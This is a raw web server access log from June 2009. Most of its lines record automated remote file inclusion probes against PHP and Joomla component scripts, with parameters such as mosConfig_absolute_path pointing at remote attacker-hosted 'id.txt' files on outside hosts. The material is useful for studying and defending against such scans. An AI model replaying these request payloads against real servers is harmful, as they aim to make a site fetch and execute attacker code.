89.223.3.98 - - [04/Jun/2009:01:17:22 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:17:28 -0500] "GET /logs/access_log.1237680000//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:17:29 -0500] "GET /logs/access_log.1237680000//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
62.149.15.68 - - [04/Jun/2009:01:17:46 -0500] "GET /logs/access_log.1236643200//?_zb_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.149.15.68 - - [04/Jun/2009:01:17:54 -0500] "GET /logs/access_log.1235520000//?_zb_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:18:51 -0500] "GET /admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:18:51 -0500] "GET /logs/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:18:51 -0500] "GET /logs/access_log.1241568000/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.149.15.68 - - [04/Jun/2009:01:19:21 -0500] "GET /logs/access_log.1228608000//?_zb_path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:19:22 -0500] "GET /admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:19:22 -0500] "GET /logs/access_log.1241568000/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:19:26 -0500] "GET /logs/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:20:13 -0500] "GET /logs/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:20:13 -0500] "GET /admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:20:13 -0500] "GET /logs/access_log.1241568000/admin.admin.html.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:22:28 -0500] "GET /admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:22:28 -0500] "GET /logs/admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:22:28 -0500] "GET /logs/access_log.1241568000/admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:22:34 -0500] "GET /admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:22:34 -0500] "GET /logs/admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:22:34 -0500] "GET /logs/access_log.1241568000/admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:01:25:09 -0500] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:01:25:09 -0500] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:01:25:09 -0500] "GET /logs/access_log.1230249600/inc/cmses/aedatingCMS.php?dir[inc]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:27:55 -0500] "GET //skin/zero_vote/error.php?dir=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:28:52 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:28:53 -0500] "GET //skin/zero_vote/error.php?dir=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:28:53 -0500] "GET /logs/access_log.1239062400//skin/zero_vote/error.php?dir=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.249.66.6 - - [04/Jun/2009:01:29:59 -0500] "GET /_vti_cnf/?N=D HTTP/1.1" 200 676 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
85.17.162.28 - - [04/Jun/2009:01:30:03 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 310 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.162.28 - - [04/Jun/2009:01:30:03 -0500] "GET /?sourcedir=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 200 3245 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.162.28 - - [04/Jun/2009:01:30:04 -0500] "GET /logs/?sourcedir=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 200 191984 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.162.28 - - [04/Jun/2009:01:30:10 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 310 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.223.3.98 - - [04/Jun/2009:01:30:14 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:30:14 -0500] "GET /logs/access_log.1239062400//skin/zero_vote/error.php?dir=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:31:17 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/error.php?dir=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.223.3.98 - - [04/Jun/2009:01:32:20 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/error.php?dir=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.106.191 - - [04/Jun/2009:01:35:38 -0500] "GET /logs/access_log.1235779200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.216 - - [04/Jun/2009:01:37:07 -0500] "GET /logs/access_log.1155081600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.185.20.88 - - [04/Jun/2009:01:39:24 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:39:24 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:39:24 -0500] "GET /logs/access_log.1240358400//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:39:24 -0500] "GET /logs/access_log.1239926400//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:40:01 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:40:01 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:40:01 -0500] "GET /logs/access_log.1240358400//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:40:01 -0500] "GET /logs/access_log.1239926400//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:40:51 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:41:02 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:41:02 -0500] "GET /logs/access_log.1240358400//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:42:07 -0500] "GET /logs/access_log.1242000000//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:42:23 -0500] "GET /logs/access_log.1242000000//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:01:42:27 -0500] "GET /logs/access_log.1233360000//components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 353 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:01:42:27 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:01:42:27 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:01:42:27 -0500] "GET /logs/access_log.1239235200//components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 353 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:42:57 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:42:57 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:01:43:48 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 342 "-""Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:01:43:48 -0500] "GET /logs/access_log.1242000000/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 369 "-""Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:01:43:48 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 347 "-""Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:01:43:59 -0500] "GET /logs/access_log.1240358400/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 369 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:01:45:13 -0500] "GET /logs/access_log.1237680000/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:01:45:13 -0500] "GET /logs/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:01:45:13 -0500] "GET /administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:01:45:20 -0500] "GET /logs/access_log.1241308800/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
65.55.208.136 - - [04/Jun/2009:01:46:05 -0500] "GET /logs/access_log.1145318400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [04/Jun/2009:01:46:05 -0500] "GET /logs/access_log.1162166400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [04/Jun/2009:01:46:05 -0500] "GET /logs/access_log.1203379200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [04/Jun/2009:01:46:05 -0500] "GET /logs/access_log.1144108800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
211.234.100.126 - - [04/Jun/2009:01:47:07 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.largeface.com/gnuboard4/style/sid.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.234.100.126 - - [04/Jun/2009:01:47:07 -0500] "GET /logs/access_log.1242000000/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.largeface.com/gnuboard4/style/sid.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
211.234.100.126 - - [04/Jun/2009:01:47:07 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.largeface.com/gnuboard4/style/sid.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
211.234.100.126 - - [04/Jun/2009:01:47:23 -0500] "GET /logs/access_log.1240358400/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.largeface.com/gnuboard4/style/sid.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:01:48:42 -0500] "GET /phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:01:48:42 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:01:48:42 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.149.157.130 - - [04/Jun/2009:01:49:04 -0500] "GET //ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:01:49:04 -0500] "GET /logs//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:01:49:04 -0500] "GET /logs/access_log.1241740800//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:01:49:10 -0500] "GET /logs/access_log.1241136000//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:01:50:15 -0500] "GET /logs/access_log.1241740800//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:01:50:15 -0500] "GET //ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:01:50:15 -0500] "GET /logs//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
91.149.157.130 - - [04/Jun/2009:01:50:19 -0500] "GET /logs/access_log.1241136000//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
122.153.212.195 - - [04/Jun/2009:01:50:28 -0500] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:01:50:33 -0500] "GET /logs/access_log.1231027200/vwar/convert/mvcw.php?step=1&vwar_root=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
65.55.208.132 - - [04/Jun/2009:01:50:35 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [04/Jun/2009:01:50:36 -0500] "GET /logs/access_log.1150588800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
122.153.212.195 - - [04/Jun/2009:01:50:37 -0500] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:51:29 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:51:29 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:51:32 -0500] "GET /logs/access_log.1240358400//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:52:06 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:52:06 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:52:06 -0500] "GET /logs/access_log.1240358400//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:01:53:38 -0500] "GET /logs/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:01:53:38 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:01:53:38 -0500] "GET /errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:01:53:47 -0500] "GET /logs/access_log.1236643200/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:54:38 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:54:38 -0500] "GET /logs/access_log.1240358400//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:01:54:38 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:54:43 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:54:43 -0500] "GET /logs/access_log.1239926400//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:54:43 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:54:43 -0500] "GET /logs/access_log.1240358400//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:55:03 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:55:26 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:55:26 -0500] "GET /logs/access_log.1239926400//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:55:26 -0500] "GET /logs/access_log.1240358400//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:56:39 -0500] "GET /logs/access_log.1242000000//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:01:56:53 -0500] "GET /logs/access_log.1242000000//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
110.45.144.106 - - [04/Jun/2009:01:57:10 -0500] "GET //include/mail.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
110.45.144.106 - - [04/Jun/2009:01:57:10 -0500] "GET /logs//include/mail.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
110.45.144.106 - - [04/Jun/2009:01:57:10 -0500] "GET /logs/access_log.1233705600//include/mail.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
110.45.144.106 - - [04/Jun/2009:01:57:16 -0500] "GET /logs/access_log.1233878400//include/mail.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:01:57:38 -0500] "GET /?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:01:57:38 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:01:57:39 -0500] "GET /logs/?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 191984 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:01:57:49 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
